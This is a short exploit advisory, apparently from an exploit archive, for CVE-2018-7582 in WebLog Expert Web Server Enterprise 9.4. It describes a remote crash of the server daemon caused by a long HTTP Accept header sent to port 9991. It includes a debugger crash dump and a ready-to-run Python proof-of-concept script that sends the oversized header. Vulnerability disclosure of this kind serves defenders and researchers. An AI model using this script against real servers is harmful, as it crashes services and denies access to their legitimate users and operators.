WebLog Expert Web Server Enterprise 9.4 Denial Of Service Exploit

[+] Credits: John Page (aka hyp3rlinx)  

Vendor:
=======
www.weblogexpert.com


Product:
=========
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.



Vulnerability Type:
===================
Denial Of Service


CVE Reference:
==============
CVE-2018-7582



Security Issue:
================
WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991.


(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404          add     esp,4



Exploit/POC:
=============
import socket

print 'Weblog Expert Server / Denial Of Service'
print 'hyp3rlinx'

IP='Weblog Expert Server IP'
PORT=9991
PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n'

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(PAYLOAD)
s.close()

#  0day.today [2018-03-20]  #